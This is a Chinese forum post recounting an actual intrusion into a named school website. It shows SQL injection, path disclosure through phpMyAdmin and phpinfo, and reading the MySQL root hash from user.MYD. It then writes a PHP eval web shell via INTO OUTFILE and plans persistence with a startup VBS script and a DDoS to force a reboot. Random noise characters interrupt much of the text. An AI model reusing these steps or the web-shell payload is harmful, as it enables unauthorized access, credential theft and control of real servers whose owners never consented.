第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏; O0 K' D# k0 F$ C2 G7 r. Y
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
- R& {/ t& i) \
) Y1 |0 M# v/ T; ^) K
' G- g- n; Q Y v, H5 I$ c8 A+ \* v* j* l$ n4 {
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 1 @0 H: s8 [$ D8 f
; a+ {1 o7 d) B; j/ i/ z) R
那么想可以直接写入shell ,getshell有几个条件:
9 T& T- H" M9 p" ~3 e7 H1 ]1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
: N/ P1 s/ `2 c# h4 g! }, Z3 K4 C- Q7 C+ _; Q. {) h8 l7 ^. S
试着爆绝对路径: 5 `$ ]) h+ [1 f' c5 o' V6 X- Q
1./phpMyAdmin/index.php?lang[]=1 + N v) ^* e4 x
2./phpMyAdmin/phpinfo.php - H/ O+ Z4 ?' n/ L6 U% n( _
3./load_file() # {9 K# T: D. L7 }3 {1 \
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
% U- c) p! S1 E5./phpmyadmin/libraries/select_lang.lib.php : i* U- x6 q- B* P: {
6./phpmyadmin/libraries/lect_lang.lib.php 0 \# @' W: |: j$ o: p% b" s
7./phpmyadmin/libraries/mcrypt.lib.php . p( X# n; M" z1 ^$ u0 P# z
8./phpmyadmin/libraries/export/xls.php
( U: V0 Q3 k: ~, m! S4 d; Q
- ?' N5 i6 @8 p, }1 p均不行........................... 3 V, m+ w5 t) s O# I o; J
0 Q# W! c8 W, j+ `
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
. {, B8 B0 v& u* y' \
# X) t7 T) c$ K" n权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin ' [, W% i+ F' I* q$ H
+ Q, r: I9 k6 v" J X3 {默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
' o6 k9 N: d# J2 t7 {
3 b, u" x% ?8 j+ @, b% m敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
6 r+ x- m) a* X( m( L2 p7 r! m3 i: @! U! x- b
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell - ]; L1 b1 F7 O; w
8 G9 Q ?) z& Whttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
' g) |& M' l( ?1 t/ @* i2 i0 y5 _( }" H
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD & o7 T, @9 J9 Z I4 K6 C9 @
. {! r( Q% a2 A5 ?6 y3 w成功读到root密码:
% T3 j+ n4 u. U) l! `" F' \, U7 u$ T1 B
17---- r(0072)
$ W& l' | n v" |& C2 J: H5 q18---- o(006f)
8 g0 ]" T# G, W; g' H19---- o(006f) 5 |) \/ ] ?- o: i: R
20---- t(0074)
$ d. L) I$ z9 w& M21---- *(002a)
. A8 [; y" U3 a+ ^22---- 8(0038)
( D0 _4 a+ y0 R4 g23---- 2(0032)
8 N4 l& T* A* g/ i) G24---- E(0045)
1 y( }" o( V1 C$ y) O- _+ C25---- 1(0031) , ^4 ]2 B8 |! W* b1 ?" T" x
26---- C(0043)
) D/ O2 j$ u5 y. L, u( I) i( }27---- 5(0035) 7 n3 m3 R8 a9 ` V
28---- 8(0038) $ d9 R+ } g( q7 M/ d3 F- c5 ~
29---- 2(0032) 6 K: o, r- ^% R& `; ?) h
30---- 8(0038)
" W2 [# i+ [: x: M3 {8 E5 G31---- A(0041)
" `7 Y1 h0 C! w! H9 d32---- 9(0039)
- H4 G6 b- ?4 o! i% k3 a4 e1 D( `33---- B(0042) / l& ~* S/ n6 k5 j0 L1 M( f
34---- 5(0035) $ |6 ~$ T' C, a# Z$ ~! Z
35---- 4(0034)
- D* n2 @; r4 W) u: ~* f36---- 8(0038)
' z! v$ t( Y, W37---- 6(0036) + M A* c6 f s _, d( \6 R( O3 {6 @
38---- 4(0034) |+ j4 L) o' G, U' W% v0 r5 D
39---- 9(0039)
4 ?# _) m" V d( G40---- 1(0031)
9 U k$ o# U( `% f9 t41---- 1(0031) & d4 O# y; v+ T2 t
42---- 5(0035)
; ?: b0 ^6 k; l8 x$ x5 I" a1 t$ o. T43---- 3(0033)
, o4 |8 G8 ^ @& Q44---- 5(0035) 1 ~) X5 V5 ~( S9 \# p
45---- 9(0039)
! a: V. q4 u/ |. ]5 x46---- 8(0038)
3 W |- |# M, O# U5 j" X47---- F(0046) $ l& @" L4 C0 S; \
48---- F(0046) 5 p. I& k' C/ Q
49---- 4(0034)
1 K1 o4 p9 V/ d4 u0 P/ K( W50---- F(0046)
3 G/ k4 d* a% `; `8 M- U% b5 I" f& C1 s& v51---- 0(0030)
* x& ^+ h \0 g8 W) n1 Q52---- 3(0033)
) d9 f/ i5 y4 G53---- 2(0032) ( S Z1 @4 h' v& b5 \1 n2 ?
54---- A(0041)
0 T& I/ r3 [2 ]" u; x55---- 4(0034)
# Y: Z2 X- V" }% {( D# {$ O56---- A(0041) 3 D) w. L6 l8 K1 G' }. x" j
57---- B(0042)
& P* w9 j$ r( T- X' b$ E' [8 C58---- *(0044)
4 N/ c+ E! L/ }' k. x59---- *(0035)
! Z/ t" J! j8 m1 |8 W# H60---- *(0041) " ]' u$ w0 T2 x
61---- *0032) ; y( | D" F9 N) a4 U* E
3 c' J) i6 ], y1 u$ F: i+ Z8 M
解密后成功登陆phpmyamin 5 b4 G. Y9 i+ T( e1 o+ d$ j+ h; |
& i1 Y- G- P3 m/ r
8 F9 ]) Y0 v0 V, ~* A! f
5 p, E, ~( k2 Q' ] ^& S. p1 p2 I: G9 w/ y$ w! D
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 W7 z5 |" G9 }; t7 m
+ y, V' |9 K1 X成功执行,拿下shell,菜刀连接:
$ L& I* l, a2 k& `' C* e( x$ C0 `9 [" `4 Y; e
服务器不支持asp,aspx,php提权无果...................
0 Y3 w9 x" g' }/ E, e- ~' a* R. ?/ c9 W
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 8 M$ z+ v% N8 t
服务器上已经有个隐藏帐号了
7 C! B- x7 N S* g别名 administrators
+ B( ]8 U4 K# `6 N; m注释 管理员对计算机/域有不受限制的完全访问权 " m8 e) K! j, W3 x* V: t |4 ?6 g! {
成员
# b& P9 j1 _" P& {- l; m; ~8 n-------------------------------------------------------------------------------% S+ l# g: L. X- X
admin
; Z9 \% |+ V5 Q) [0 |* sAdministrator! _8 G k5 k5 }3 }0 z2 Y
slipper$. y, Q4 V6 t; N8 e3 {5 r, T! G
sqluser! Y$ n8 C1 \, @. P* |1 i6 q8 ]
命令成功完成。
! }& k: m8 M; s: a5 U# h c5 w8 {8 E& A$ K: b- P
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。8 B9 l* W/ s% Y/ K
. U7 e$ M6 B! A% ^ddos服务器重启,不然就只能坐等服务器重启了...............................1 [& \ y/ C. y. R2 J' v z) B
) ?: i2 A6 w8 t% x
% [1 m5 Z& J! M+ F$ x | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
